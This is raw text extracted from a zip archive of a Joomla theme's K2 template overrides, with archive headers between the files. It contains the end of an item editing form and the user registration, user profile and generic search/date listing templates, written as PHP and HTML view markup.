													<p><?php echo JText::_('K2_PLEASE_SELECT_A_CATEGORY_FIRST_TO_RETRIEVE_ITS_RELATED_EXTRA_FIELDS'); ?></p>
												</div>
											</div>
											<?php endif; ?>
										<?php endif; ?>
									</div>
									<?php if (count($this->K2PluginsItemExtraFields)): ?>
									<div class="itemPlugins">
										<?php foreach($this->K2PluginsItemExtraFields as $K2Plugin): ?>
										<?php if(!is_null($K2Plugin)): ?>
										<fieldset>
											<legend><?php echo $K2Plugin->name; ?></legend>
											<?php echo $K2Plugin->fields; ?>
										</fieldset>
										<?php endif; ?>
										<?php endforeach; ?>
									</div>
									<?php endif; ?>
								</div>
								<?php endif; ?>
								<?php if ($this->params->get('showAttachmentsTab')): ?>
								<!-- Tab attachements -->
								<div class="k2TabsContent" id="k2Tab6">
									<div class="itemAttachments">
										<?php if (count($this->row->attachments)): ?>
										<table class="adminlist">
											<tr>
												<th>
													<?php echo JText::_('K2_FILENAME'); ?>
												</th>
												<th>
													<?php echo JText::_('K2_TITLE'); ?>
												</th>
												<th>
													<?php echo JText::_('K2_TITLE_ATTRIBUTE'); ?>
												</th>
												<th>
													<?php echo JText::_('K2_DOWNLOADS'); ?>
												</th>
												<th>
													<?php echo JText::_('K2_OPERATIONS'); ?>
												</th>
											</tr>
											<?php foreach($this->row->attachments as $attachment): ?>
											<tr>
												<td class="attachment_entry">
													<?php echo $attachment->filename; ?>
												</td>
												<td>
													<?php echo $attachment->title; ?>
												</td>
												<td>
													<?php echo $attachment->titleAttribute; ?>
												</td>
												<td>
													<?php echo $attachment->hits; ?>
												</td>
												<td>
													<a href="<?php echo $attachment->link; ?>"><?php echo JText::_('K2_DOWNLOAD'); ?></a> <a class="deleteAttachmentButton" href="<?php echo JURI::base(true); ?>/index.php?option=com_k2&amp;view=item&amp;task=deleteAttachment&amp;id=<?php echo $attachment->id?>&amp;cid=<?php echo $this->row->id; ?>"><?php echo JText::_('K2_DELETE'); ?></a>
												</td>
											</tr>
											<?php endforeach; ?>
										</table>
										<?php endif; ?>
									</div>
									<div id="addAttachment">
										<input type="button" id="addAttachmentButton" class="k2Selector k2Button" value="<?php echo JText::_('K2_ADD_ATTACHMENT_FIELD'); ?>" />
										<i>(<?php echo JText::_('K2_MAX_UPLOAD_SIZE'); ?>: <?php echo ini_get('upload_max_filesize'); ?>)</i> </div>
									<div id="itemAttachments"></div>
									<?php if (count($this->K2PluginsItemAttachments)): ?>
									<div class="itemPlugins">
										<?php foreach($this->K2PluginsItemAttachments as $K2Plugin): ?>
										<?php if(!is_null($K2Plugin)): ?>
										<fieldset>
											<legend><?php echo $K2Plugin->name; ?></legend>
											<?php echo $K2Plugin->fields; ?>
										</fieldset>
										<?php endif; ?>
										<?php endforeach; ?>
									</div>
									<?php endif; ?>
								</div>
								<?php endif; ?>
								<?php if(count(array_filter($this->K2PluginsItemOther)) && $this->params->get('showK2Plugins')): ?>
								<!-- Tab other plugins -->
								<div class="k2TabsContent" id="k2Tab7">
									<div class="itemPlugins">
										<?php foreach($this->K2PluginsItemOther as $K2Plugin): ?>
										<?php if(!is_null($K2Plugin)): ?>
										<fieldset>
											<legend><?php echo $K2Plugin->name; ?></legend>
											<?php echo $K2Plugin->fields; ?>
										</fieldset>
										<?php endif; ?>
										<?php endforeach; ?>
									</div>
								</div>
								<?php endif; ?>
							</div>
							<!-- Tabs end here -->

							<input type="hidden" name="isSite" value="<?php echo (int)$this->mainframe->isSite(); ?>" />
							<?php if($this->mainframe->isSite()): ?>
							<input type="hidden" name="lang" value="<?php echo JRequest::getCmd('lang'); ?>" />
							<?php endif; ?>
							<input type="hidden" name="id" value="<?php echo $this->row->id; ?>" />
							<input type="hidden" name="option" value="com_k2" />
							<input type="hidden" name="view" value="item" />
							<input type="hidden" name="task" value="<?php echo JRequest::getVar('task'); ?>" />
							<input type="hidden" name="Itemid" value="<?php echo JRequest::getInt('Itemid'); ?>" />
							<?php echo JHTML::_('form.token'); ?>
						</td>

						<!-- Sidebar -->
						<td id="adminFormK2Sidebar"<?php if($this->mainframe->isSite() && !$this->params->get('sideBarDisplayFrontend')): ?> style="display:none;"<?php endif; ?> class="xmlParamsFields">
							<?php if($this->row->id): ?>
							<table class="sidebarDetails">
								<tr>
									<td>
										<strong><?php echo JText::_('K2_ITEM_ID'); ?></strong>
									</td>
									<td>
										<?php echo $this->row->id; ?>
									</td>
								</tr>
								<tr>
									<td>
										<strong><?php echo JText::_('K2_PUBLISHED'); ?></strong>
									</td>
									<td>
										<?php echo ($this->row->published > 0) ? JText::_('K2_YES') : JText::_('K2_NO'); ?>
									</td>
								</tr>
								<tr>
									<td>
										<strong><?php echo JText::_('K2_FEATURED'); ?></strong>
									</td>
									<td>
										<?php echo ($this->row->featured > 0) ? JText::_('K2_YES'):	JText::_('K2_NO'); ?>
									</td>
								</tr>
								<tr>
									<td>
										<strong><?php echo JText::_('K2_CREATED_DATE'); ?></strong>
									</td>
									<td>
										<?php echo $this->lists['created']; ?>
									</td>
								</tr>
								<tr>
									<td>
										<strong><?php echo JText::_('K2_CREATED_BY'); ?></strong>
									</td>
									<td>
										<?php echo $this->row->author; ?>
									</td>
								</tr>
								<tr>
									<td>
										<strong><?php echo JText::_('K2_MODIFIED_DATE'); ?></strong>
									</td>
									<td>
										<?php echo $this->lists['modified']; ?>
									</td>
								</tr>
								<tr>
									<td>
										<strong><?php echo JText::_('K2_MODIFIED_BY'); ?></strong>
									</td>
									<td>
										<?php echo $this->row->moderator; ?>
									</td>
								</tr>
								<tr>
									<td>
										<strong><?php echo JText::_('K2_HITS'); ?></strong>
									</td>
									<td>
										<?php echo $this->row->hits; ?>
										<?php if($this->row->hits): ?>
										<input id="resetHitsButton" type="button" value="<?php echo JText::_('K2_RESET'); ?>" class="button" name="resetHits" />
										<?php endif; ?>
									</td>
								</tr>
								<?php endif; ?>
								<?php if($this->row->id): ?>
								<tr>
									<td>
										<strong><?php echo JText::_('K2_RATING'); ?></strong>
									</td>
									<td>
										<?php echo $this->row->ratingCount; ?> <?php echo JText::_('K2_VOTES'); ?>
										<?php if($this->row->ratingCount): ?>
										<br />
										(<?php echo JText::_('K2_AVERAGE_RATING'); ?>: <?php echo number_format(($this->row->ratingSum/$this->row->ratingCount),2); ?>/5.00)
										<?php endif; ?>
										<input id="resetRatingButton" type="button" value="<?php echo JText::_('K2_RESET'); ?>" class="button" name="resetRating" />
									</td>
								</tr>
							</table>
							<?php endif; ?>
							<!-- Author Publishing Status -->
							<h3><a href="#"><?php echo JText::_('K2_AUTHOR_PUBLISHING_STATUS'); ?></a></h3>
							<div>
								<table class="admintable">
									<?php if(isset($this->lists['language'])): ?>
									<tr>
										<td align="right" class="key">
											<?php echo JText::_('K2_LANGUAGE'); ?>
										</td>
										<td>
											<?php echo $this->lists['language']; ?>
										</td>
									</tr>
									<?php endif; ?>
									<tr>
										<td align="right" class="key">
											<?php echo JText::_('K2_AUTHOR'); ?>
										</td>
										<td id="k2AuthorOptions">
											<span id="k2Author"><?php echo $this->row->author; ?></span>
											<?php if($this->mainframe->isAdmin() || ($this->mainframe->isSite() && $this->permissions->get('editAll'))): ?>
											<a class="modal" rel="{handler:'iframe', size: {x: 800, y: 460}}" href="index.php?option=com_k2&amp;view=users&amp;task=element&amp;tmpl=component"><?php echo JText::_('K2_CHANGE'); ?></a>
											<input type="hidden" name="created_by" value="<?php echo $this->row->created_by; ?>" />
											<?php endif; ?>
										</td>
									</tr>
									<tr>
										<td align="right" class="key">
											<?php echo JText::_('K2_AUTHOR_ALIAS'); ?>
										</td>
										<td>
											<input class="text_area" type="text" name="created_by_alias" maxlength="250" value="<?php echo $this->row->created_by_alias; ?>" />
										</td>
									</tr>
									<tr>
										<td align="right" class="key">
											<?php echo JText::_('K2_ACCESS_LEVEL'); ?>
										</td>
										<td>
											<?php echo $this->lists['access']; ?>
										</td>
									</tr>
									<tr>
										<td align="right" class="key">
											<?php echo JText::_('K2_CREATION_DATE'); ?>
										</td>
										<td class="k2ItemFormDateField">
											<?php echo $this->lists['createdCalendar']; ?>
										</td>
									</tr>
									<tr>
										<td align="right" class="key">
											<?php echo JText::_('K2_START_PUBLISHING'); ?>
										</td>
										<td class="k2ItemFormDateField">
											<?php echo $this->lists['publish_up']; ?>
										</td>
									</tr>
									<tr>
										<td align="right" class="key">
											<?php echo JText::_('K2_FINISH_PUBLISHING'); ?>
										</td>
										<td class="k2ItemFormDateField">
											<?php echo $this->lists['publish_down']; ?>
										</td>
									</tr>
								</table>
							</div>

							<!-- Metadata Info -->
							<h3><a href="#"><?php echo JText::_('K2_METADATA_INFORMATION'); ?></a></h3>
							<div>
								<table class="admintable">
									<tr>
										<td align="right" class="key">
											<?php echo JText::_('K2_DESCRIPTION'); ?>
										</td>
										<td>
											<textarea name="metadesc" rows="5" cols="20"><?php echo $this->row->metadesc; ?></textarea>
										</td>
									</tr>
									<tr>
										<td align="right" class="key">
											<?php echo JText::_('K2_KEYWORDS'); ?>
										</td>
										<td>
											<textarea name="metakey" rows="5" cols="20"><?php echo $this->row->metakey; ?></textarea>
										</td>
									</tr>
									<tr>
										<td align="right" class="key">
											<?php echo JText::_('K2_ROBOTS'); ?>
										</td>
										<td>
											<input type="text" name="meta[robots]" value="<?php echo $this->lists['metadata']->get('robots'); ?>" />
										</td>
									</tr>
									<tr>
										<td align="right" class="key">
											<?php echo JText::_('K2_AUTHOR'); ?>
										</td>
										<td>
											<input type="text" name="meta[author]" value="<?php echo $this->lists['metadata']->get('author'); ?>" />
										</td>
									</tr>
								</table>
							</div>

							<?php if($this->mainframe->isAdmin()): ?>
							<h3><a href="#"><?php echo JText::_('K2_ITEM_VIEW_OPTIONS_IN_CATEGORY_LISTINGS'); ?></a></h3>
							<div>
								<?php if(version_compare( JVERSION, '1.6.0', 'ge' )): ?>
								<fieldset class="panelform">
									<ul class="adminformlist">
										<?php foreach($this->form->getFieldset('item-view-options-listings') as $field): ?>
										<li>
											<?php if($field->type=='header'): ?>
											<div class="paramValueHeader"><?php echo $field->input; ?></div>
											<?php elseif($field->type=='Spacer'): ?>
											<div class="paramValueSpacer">&nbsp;</div>
											<div class="clr"></div>
											<?php else: ?>
											<div class="paramLabel"><?php echo $field->label; ?></div>
											<div class="paramValue"><?php echo $field->input; ?></div>
											<div class="clr"></div>
											<?php endif; ?>
										</li>
										<?php endforeach; ?>
									</ul>
								</fieldset>
								<?php else: ?>
								<?php echo $this->form->render('params', 'item-view-options-listings'); ?>
								<?php endif; ?>
							</div>

							<h3><a href="#"><?php echo JText::_('K2_ITEM_VIEW_OPTIONS'); ?></a></h3>
							<div>
								<?php if(version_compare( JVERSION, '1.6.0', 'ge' )): ?>
								<fieldset class="panelform">
									<ul class="adminformlist">
										<?php foreach($this->form->getFieldset('item-view-options') as $field): ?>
										<li>
											<?php if($field->type=='header'): ?>
											<div class="paramValueHeader"><?php echo $field->input; ?></div>
											<?php elseif($field->type=='Spacer'): ?>
											<div class="paramValueSpacer">&nbsp;</div>
											<div class="clr"></div>
											<?php else: ?>
											<div class="paramLabel"><?php echo $field->label; ?></div>
											<div class="paramValue"><?php echo $field->input; ?></div>
											<div class="clr"></div>
											<?php endif; ?>
										</li>
										<?php endforeach; ?>
									</ul>
								</fieldset>
								<?php else: ?>
								<?php echo $this->form->render('params', 'item-view-options'); ?>
								<?php endif; ?>
							</div>
							<?php endif; ?>
						</td>
					</tr>
				</tbody>
			</table>
			<div class="clr"></div>
			<?php if($this->mainframe->isSite()): ?>
		</div>
	</div>
	<?php endif; ?>
</form>
PK!%���##)bizone/html/com_k2/templates/register.phpnu&1i�<?php
/**
 * @version		2.6.x
 * @package		K2
 * @author		JoomlaWorks http://www.joomlaworks.net
 * @copyright	Copyright (c) 2006 - 2014 JoomlaWorks Ltd. All rights reserved.
 * @license		GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<!-- K2 user register form -->
<?php if(isset($this->message)) $this->display('message'); ?>

<form action="<?php echo JURI::root(true); ?>/index.php" enctype="multipart/form-data" method="post" id="josForm" name="josForm" class="form-validate">
	<?php if($this->params->def('show_page_title',1)): ?>
	<div class="componentheading<?php echo $this->escape($this->params->get('pageclass_sfx')); ?>">
		<?php echo $this->escape($this->params->get('page_title')); ?>
	</div>
	<?php endif; ?>
	<div id="k2Container" class="k2AccountPage">
		<table class="admintable" cellpadding="0" cellspacing="0">
			<tr>
				<th colspan="2" class="k2ProfileHeading">
					<?php echo JText::_('K2_ACCOUNT_DETAILS'); ?>
				</th>
			</tr>
			<tr>
				<td class="key">
					<label id="namemsg" for="name"><?php echo JText::_('K2_NAME'); ?></label>
				</td>
				<td>
					<input type="text" name="<?php echo $this->nameFieldName; ?>" id="name" size="40" value="<?php echo $this->escape($this->user->get( 'name' )); ?>" class="inputbox required" maxlength="50" />
					*
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="usernamemsg" for="username"><?php echo JText::_('K2_USER_NAME'); ?></label>
				</td>
				<td>
					<input type="text" id="username" name="<?php echo $this->usernameFieldName; ?>" size="40" value="<?php echo $this->escape($this->user->get( 'username' )); ?>" class="inputbox required validate-username" maxlength="25" />
					*
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="emailmsg" for="email"><?php echo JText::_('K2_EMAIL'); ?></label>
				</td>
				<td>
					<input type="text" id="email" name="<?php echo $this->emailFieldName; ?>" size="40" value="<?php echo $this->escape($this->user->get( 'email' )); ?>" class="inputbox required validate-email" maxlength="100" />
					*
				</td>
			</tr>
			<?php if(version_compare(JVERSION, '1.6', 'ge')): ?>
			<tr>
				<td class="key">
					<label id="email2msg" for="email2"><?php echo JText::_('K2_CONFIRM_EMAIL'); ?></label>
				</td>
				<td>
					<input type="text" id="email2" name="jform[email2]" size="40" value="" class="inputbox required validate-email" maxlength="100" />
					*
				</td>
			</tr>
			<?php endif; ?>
			<tr>
				<td class="key">
					<label id="pwmsg" for="password"><?php echo JText::_('K2_PASSWORD'); ?></label>
				</td>
				<td>
					<input class="inputbox required validate-password" type="password" id="password" name="<?php echo $this->passwordFieldName; ?>" size="40" value="" />
					*
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="pw2msg" for="password2"><?php echo JText::_('K2_VERIFY_PASSWORD'); ?></label>
				</td>
				<td>
					<input class="inputbox required validate-passverify" type="password" id="password2" name="<?php echo $this->passwordVerifyFieldName; ?>" size="40" value="" />
					*
				</td>
			</tr>
			<tr>
				<th colspan="2" class="k2ProfileHeading">
					<?php echo JText::_('K2_PERSONAL_DETAILS'); ?>
				</th>
			</tr>
			<!-- K2 attached fields -->
			<tr>
				<td class="key">
					<label id="gendermsg" for="gender"><?php echo JText::_('K2_GENDER'); ?></label>
				</td>
				<td>
					<?php echo $this->lists['gender']; ?>
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="descriptionmsg" for="description"><?php echo JText::_('K2_DESCRIPTION'); ?></label>
				</td>
				<td>
					<?php echo $this->editor; ?>
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="imagemsg" for="image"><?php echo JText::_( 'K2_USER_IMAGE_AVATAR' ); ?></label>
				</td>
				<td>
					<input type="file" id="image" name="image"/>
					<?php if ($this->K2User->image): ?>
					<img class="k2AdminImage" src="<?php echo JURI::root().'media/k2/users/'.$this->K2User->image; ?>" alt="<?php echo $this->user->name; ?>" />
					<input type="checkbox" name="del_image" id="del_image" />
					<label for="del_image"><?php echo JText::_('K2_CHECK_THIS_BOX_TO_DELETE_CURRENT_IMAGE_OR_JUST_UPLOAD_A_NEW_IMAGE_TO_REPLACE_THE_EXISTING_ONE'); ?></label>
					<?php endif; ?>
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="urlmsg" for="url"><?php echo JText::_('K2_URL'); ?></label>
				</td>
				<td>
					<input type="text" size="50" value="<?php echo $this->K2User->url; ?>" name="url" id="url"/>
				</td>
			</tr>
			<?php if(count(array_filter($this->K2Plugins))): ?>
			<!-- K2 Plugin attached fields -->
			<tr>
				<th colspan="2" class="k2ProfileHeading">
					<?php echo JText::_('K2_ADDITIONAL_DETAILS'); ?>
				</th>
			</tr>
			<?php foreach ($this->K2Plugins as $K2Plugin): ?>
			<?php if(!is_null($K2Plugin)): ?>
			<tr>
				<td colspan="2">
					<?php echo $K2Plugin->fields; ?>
				</td>
			</tr>
			<?php endif; ?>
			<?php endforeach; ?>
			<?php endif; ?>
			
			<!-- Joomla! 1.6+ JForm implementation -->
			<?php if(isset($this->form)): ?>
			<?php foreach ($this->form->getFieldsets() as $fieldset): // Iterate through the form fieldsets and display each one.?>
				<?php if($fieldset->name != 'default'): ?>
				<?php $fields = $this->form->getFieldset($fieldset->name);?>
				<?php if (count($fields)):?>
					<?php if (isset($fieldset->label)):// If the fieldset has a label set, display it as the legend.?>
					<tr>
						<th colspan="2" class="k2ProfileHeading">
							<?php echo JText::_($fieldset->label);?>
						</th>
					</tr>
					<?php endif;?>
					<?php foreach($fields as $field):// Iterate through the fields in the set and display them.?>
						<?php if ($field->hidden):// If the field is hidden, just display the input.?>
							<tr><td colspan="2"><?php echo $field->input;?></td></tr>
						<?php else:?>
							<tr>
								<td class="key">
									<?php echo $field->label; ?>
									<?php if (!$field->required && $field->type != 'Spacer'): ?>
										<span class="optional"><?php echo JText::_('COM_USERS_OPTIONAL');?></span>
									<?php endif; ?>
								</td>
								<td><?php echo $field->input;?></td>
							</tr>
						<?php endif;?>
					<?php endforeach;?>
				<?php endif;?>
				<?php endif; ?>
			<?php endforeach;?>
			<?php endif; ?>
			
		</table>
		
		<?php if($this->K2Params->get('recaptchaOnRegistration') && $this->K2Params->get('recaptcha_public_key')): ?>
		<label class="formRecaptcha"><?php echo JText::_('K2_ENTER_THE_TWO_WORDS_YOU_SEE_BELOW'); ?></label>
		<div id="recaptcha"></div>
		<?php endif; ?>
		
		<div class="k2AccountPageNotice"><?php echo JText::_('K2_REGISTER_REQUIRED'); ?></div>
		<div class="k2AccountPageUpdate">
			<button class="button validate" type="submit">
				<?php echo JText::_('K2_REGISTER'); ?>
			</button>
		</div>
	</div>
	<input type="hidden" name="option" value="<?php echo $this->optionValue; ?>" />
	<input type="hidden" name="task" value="<?php echo $this->taskValue; ?>" />
	<input type="hidden" name="id" value="0" />
	<input type="hidden" name="gid" value="0" />
	<input type="hidden" name="K2UserForm" value="1" />
	<?php echo JHTML::_( 'form.token' ); ?>
</form>
PK!�&�HH(bizone/html/com_k2/templates/profile.phpnu&1i�<?php
/**
 * @version		2.6.x
 * @package		K2
 * @author		JoomlaWorks http://www.joomlaworks.net
 * @copyright	Copyright (c) 2006 - 2014 JoomlaWorks Ltd. All rights reserved.
 * @license		GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<!-- K2 user profile form -->
<form action="<?php echo JURI::root(true); ?>/index.php" enctype="multipart/form-data" method="post" name="userform" autocomplete="off" class="form-validate">
	<?php if($this->params->def('show_page_title',1)): ?>
	<div class="componentheading<?php echo $this->escape($this->params->get('pageclass_sfx')); ?>">
		<?php echo $this->escape($this->params->get('page_title')); ?>
	</div>
	<?php endif; ?>
	<div id="k2Container" class="k2AccountPage">
		<table class="admintable" cellpadding="0" cellspacing="0">
			<tr>
				<th colspan="2" class="k2ProfileHeading">
					<?php echo JText::_('K2_ACCOUNT_DETAILS'); ?>
				</th>
			</tr>
			<tr>
				<td class="key">
					<label for="username"><?php echo JText::_('K2_USER_NAME'); ?></label>
				</td>
				<td>
					<span><b><?php echo $this->user->get('username'); ?></b></span>
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="namemsg" for="name"><?php echo JText::_('K2_NAME'); ?></label>
				</td>
				<td>
					<input type="text" name="<?php echo $this->nameFieldName; ?>" id="name" size="40" value="<?php echo $this->escape($this->user->get( 'name' )); ?>" class="inputbox required" maxlength="50" />
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="emailmsg" for="email"><?php echo JText::_('K2_EMAIL'); ?></label>
				</td>
				<td>
					<input type="text" id="email" name="<?php echo $this->emailFieldName; ?>" size="40" value="<?php echo $this->escape($this->user->get( 'email' )); ?>" class="inputbox required validate-email" maxlength="100" />
				</td>
			</tr>
			<?php if(version_compare(JVERSION, '2.5', 'ge')): ?>
			<tr>
				<td class="key">
					<label id="email2msg" for="email2"><?php echo JText::_('K2_CONFIRM_EMAIL'); ?></label>
				</td>
				<td>
					<input type="text" id="email2" name="jform[email2]" size="40" value="<?php echo $this->escape($this->user->get( 'email' )); ?>" class="inputbox required validate-email" maxlength="100" />
					*
				</td>
			</tr>
			<?php endif; ?>
			<tr>
				<td class="key">
					<label id="pwmsg" for="password"><?php echo JText::_('K2_PASSWORD'); ?></label>
				</td>
				<td>
					<input class="inputbox validate-password" type="password" id="password" name="<?php echo $this->passwordFieldName; ?>" size="40" value="" />
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="pw2msg" for="password2"><?php echo JText::_('K2_VERIFY_PASSWORD'); ?></label>
				</td>
				<td>
					<input class="inputbox validate-passverify" type="password" id="password2" name="<?php echo $this->passwordVerifyFieldName; ?>" size="40" value="" />
				</td>
			</tr>
			<tr>
				<th colspan="2" class="k2ProfileHeading">
					<?php echo JText::_('K2_PERSONAL_DETAILS'); ?>
				</th>
			</tr>
			<!-- K2 attached fields -->
			<tr>
				<td class="key">
					<label id="gendermsg" for="gender"><?php echo JText::_('K2_GENDER'); ?></label>
				</td>
				<td>
					<?php echo $this->lists['gender']; ?>
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="descriptionmsg" for="description"><?php echo JText::_('K2_DESCRIPTION'); ?></label>
				</td>
				<td>
					<?php echo $this->editor; ?>
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="imagemsg" for="image"><?php echo JText::_( 'K2_USER_IMAGE_AVATAR' ); ?></label>
				</td>
				<td>
					<input type="file" id="image" name="image"/>
					<?php if ($this->K2User->image): ?>
					<img class="k2AccountPageImage" src="<?php echo JURI::root(true).'/media/k2/users/'.$this->K2User->image; ?>" alt="<?php echo $this->user->name; ?>" />
					<input type="checkbox" name="del_image" id="del_image" />
					<label for="del_image"><?php echo JText::_('K2_CHECK_THIS_BOX_TO_DELETE_CURRENT_IMAGE_OR_JUST_UPLOAD_A_NEW_IMAGE_TO_REPLACE_THE_EXISTING_ONE'); ?></label>
					<?php endif; ?>
				</td>
			</tr>
			<tr>
				<td class="key">
					<label id="urlmsg" for="url"><?php echo JText::_('K2_URL'); ?></label>
				</td>
				<td>
					<input type="text" size="50" value="<?php echo $this->K2User->url; ?>" name="url" id="url"/>
				</td>
			</tr>
			<?php if(count(array_filter($this->K2Plugins))): ?>
			<!-- K2 Plugin attached fields -->
			<tr>
				<th colspan="2" class="k2ProfileHeading">
					<?php echo JText::_('K2_ADDITIONAL_DETAILS'); ?>
				</th>
			</tr>
			<?php foreach($this->K2Plugins as $K2Plugin): ?>
			<?php if(!is_null($K2Plugin)): ?>
			<tr>
				<td colspan="2">
					<?php echo $K2Plugin->fields; ?>
				</td>
			</tr>
			<?php endif; ?>
			<?php endforeach; ?>
			<?php endif; ?>
			<?php if(isset($this->params) && version_compare(JVERSION, '1.6', 'lt')): ?>
			<tr>
				<th colspan="2" class="k2ProfileHeading">
					<?php echo JText::_('K2_ADMINISTRATIVE_DETAILS'); ?>
				</th>
			</tr>
			<tr>
				<td colspan="2" id="userAdminParams">
					<?php echo $this->params->render('params'); ?>
				</td>
			</tr>
			<?php endif; ?>
			<!-- Joomla! 1.6+ JForm implementation -->
			<?php if(isset($this->form)): ?>
			<?php foreach ($this->form->getFieldsets() as $fieldset): // Iterate through the form fieldsets and display each one.?>
				<?php if($fieldset->name != 'core'): ?>
				<?php $fields = $this->form->getFieldset($fieldset->name);?>
				<?php if (count($fields)):?>
					<?php if (isset($fieldset->label)):// If the fieldset has a label set, display it as the legend.?>
					<tr>
						<th colspan="2" class="k2ProfileHeading">
							<?php echo JText::_($fieldset->label);?>
						</th>
					</tr>
					<?php endif;?>
					<?php foreach($fields as $field):// Iterate through the fields in the set and display them.?>
						<?php if ($field->hidden):// If the field is hidden, just display the input.?>
							<tr><td colspan="2"><?php echo $field->input;?></td></tr>
						<?php else:?>
							<tr>
								<td class="key">
									<?php echo $field->label; ?>
									<?php if (!$field->required && $field->type != 'Spacer'): ?>
										<span class="optional"><?php echo JText::_('COM_USERS_OPTIONAL');?></span>
									<?php endif; ?>
								</td>
								<td><?php echo $field->input;?></td>
							</tr>
						<?php endif;?>
					<?php endforeach;?>
				<?php endif;?>
				<?php endif; ?>
			<?php endforeach;?>
			<?php endif; ?>
		</table>
		<div class="k2AccountPageUpdate">
			<button class="button validate" type="submit" onclick="submitbutton( this.form );return false;">
				<?php echo JText::_('K2_SAVE'); ?>
			</button>
		</div>
	</div>
	<input type="hidden" name="<?php echo $this->usernameFieldName; ?>" value="<?php echo $this->user->get('username'); ?>" />
	<input type="hidden" name="<?php echo $this->idFieldName; ?>" value="<?php echo $this->user->get('id'); ?>" />
	<input type="hidden" name="gid" value="<?php echo $this->user->get('gid'); ?>" />
	<input type="hidden" name="option" value="<?php echo $this->optionValue; ?>" />
	<input type="hidden" name="task" value="<?php echo $this->taskValue; ?>" />
	<input type="hidden" name="K2UserForm" value="1" />
	<?php echo JHTML::_( 'form.token' ); ?>
</form>
PK!�r]<<(bizone/html/com_k2/templates/generic.phpnu&1i�<?php
/**
 * @version		2.6.x
 * @package		K2
 * @author		JoomlaWorks http://www.joomlaworks.net
 * @copyright	Copyright (c) 2006 - 2014 JoomlaWorks Ltd. All rights reserved.
 * @license		GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<!-- Start K2 Generic (search/date) Layout -->
<div id="k2Container" class="genericView<?php if($this->params->get('pageclass_sfx')) echo ' '.$this->params->get('pageclass_sfx'); ?>">

	<?php if($this->params->get('show_page_title') || JRequest::getCmd('task')=='search' || JRequest::getCmd('task')=='date'): ?>
	<!-- Page title -->
	<div class="componentheading<?php echo $this->params->get('pageclass_sfx')?>">
		<?php echo $this->escape($this->params->get('page_title')); ?>
	</div>
	<?php endif; ?>

	<?php if(JRequest::getCmd('task')=='search' && $this->params->get('googleSearch')): ?>
	<!-- Google Search container -->
	<div id="<?php echo $this->params->get('googleSearchContainer'); ?>"></div>
	<?php endif; ?>

	<?php if(count($this->items) && $this->params->get('genericFeedIcon',1)): ?>
	<!-- RSS feed icon -->
	<div class="k2FeedIcon">
		<a href="<?php echo $this->feed; ?>" title="<?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?>">
			<span><?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?></span>
		</a>
		<div class="clr"></div>
	</div>
	<?php endif; ?>

	<?php if(count($this->items)): ?>

	<div class="genericItemList">
		<?php foreach($this->items as $item): ?>

		<!-- Start K2 Item Layout -->
		<div class="genericItemView">

			<div class="genericItemHeader">
				<?php if($this->params->get('genericItemDateCreated')): ?>
				<!-- Date created -->
				<span class="genericItemDateCreated">
					<?php echo JHTML::_('date', $item->created , JText::_('K2_DATE_FORMAT_LC2')); ?>
				</span>
				<?php endif; ?>

			  <?php if($this->params->get('genericItemTitle')): ?>
			  <!-- Item title -->
			  <h2 class="genericItemTitle">
			  	<?php if ($this->params->get('genericItemTitleLinked')): ?>
					<a href="<?php echo $item->link; ?>">
			  		<?php echo $item->title; ?>
			  	</a>
			  	<?php else: ?>
			  	<?php echo $item->title; ?>
			  	<?php endif; ?>
			  </h2>
			  <?php endif; ?>
		  </div>

		  <div class="genericItemBody">
			  <?php if($this->params->get('genericItemImage') && !empty($item->imageGeneric)): ?>
			  <!-- Item Image -->
			  <div class="genericItemImageBlock">
				  <span class="genericItemImage">
				    <a href="<?php echo $item->link; ?>" title="<?php if(!empty($item->image_caption)) echo K2HelperUtilities::cleanHtml($item->image_caption); else echo K2HelperUtilities::cleanHtml($item->title); ?>">
				    	<img src="<?php echo $item->imageGeneric; ?>" alt="<?php if(!empty($item->image_caption)) echo K2HelperUtilities::cleanHtml($item->image_caption); else echo K2HelperUtilities::cleanHtml($item->title); ?>" style="width:<?php echo $this->params->get('itemImageGeneric'); ?>px; height:auto;" />
				    </a>
				  </span>
				  <div class="clr"></div>
			  </div>
			  <?php endif; ?>

			  <?php if($this->params->get('genericItemIntroText')): ?>
			  <!-- Item introtext -->
			  <div class="genericItemIntroText">
			  	<?php echo $item->introtext; ?>
			  </div>
			  <?php endif; ?>

			  <div class="clr"></div>
		  </div>

		  <div class="clr"></div>

		  <?php if($this->params->get('genericItemExtraFields') && count($item->extra_fields)): ?>
		  <!-- Item extra fields -->
		  <div class="genericItemExtraFields">
		  	<h4><?php echo JText::_('K2_ADDITIONAL_INFO'); ?></h4>
		  	<ul>
				<?php foreach ($item->extra_fields as $key=>$extraField): ?>
				<?php if($extraField->value != ''): ?>
				<li class="<?php echo ($key%2) ? "odd" : "even"; ?> type<?php echo ucfirst($extraField->type); ?> group<?php echo $extraField->group; ?>">
					<?php if($extraField->type == 'header'): ?>
					<h4 class="genericItemExtraFieldsHeader"><?php echo $extraField->name; ?></h4>
					<?php else: ?>
					<span class="genericItemExtraFieldsLabel"><?php echo $extraField->name; ?></span>
					<span class="genericItemExtraFieldsValue"><?php echo $extraField->value; ?></span>
					<?php endif; ?>
				</li>
				<?php endif; ?>
				<?php endforeach; ?>
				</ul>
		    <div class="clr"></div>
		  </div>
		  <?php endif; ?>

			<?php if($this->params->get('genericItemCategory')): ?>
			<!-- Item category name -->
			<div class="genericItemCategory">
				<span><?php echo JText::_('K2_PUBLISHED_IN'); ?></span>
				<a href="<?php echo $item->category->link; ?>"><?php echo $item->category->name; ?></a>
			</div>
